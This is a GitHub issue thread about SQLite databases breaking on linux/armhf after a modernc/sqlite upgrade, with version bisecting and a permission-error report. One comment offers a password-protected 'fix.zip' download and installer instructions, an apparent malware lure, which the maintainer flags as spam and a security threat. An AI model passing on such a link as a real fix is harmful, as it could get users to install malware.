### ISSUE TITLE
armhf: broken database after upgrading modernc/sqlite from v1.30.1 to v1.32.0

### ISSUE THREAD

**Issue by andig** [glebarez/sqlite#144]
For [evcc.io](https://evcc.io), we're using go-gorm/gorm and glebarez/sqlite for database backend. After upgrading modernc/sqlite from v1.30.1 to v1.32.0, users on `linux/armhf` architecture have experienced broken database: https://github.com/evcc-io/evcc/issues/15686#issuecomment-2309616827. Gorm error message is

    failed to initialize database, got error unable to open database file: out of memory (14)

Reverting to an earlier commit does not cure this- it looks as if the database is terminally damaged. However, the same database can still be read and processed on `darwin/arm64`- so maybe there is still hope after all.

glebarez/sqlite version remained unchanged at v1.11.0. Migrated here from https://gitlab.com/cznic/sqlite/-/issues/191.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andig** [comment]
**Warning: spam/ security threat!**

**Comment by andig** [comment]
I've narrowed the breakage to have been introduced between modernc/sqlite v1.28.0 and v1.29.0.

At this stage I have no more ideas what to investigate. The db itself does not appear to be really corrupted, just flagged as being so.

**Comment by yapishu** [comment]
this was a permission error on my end
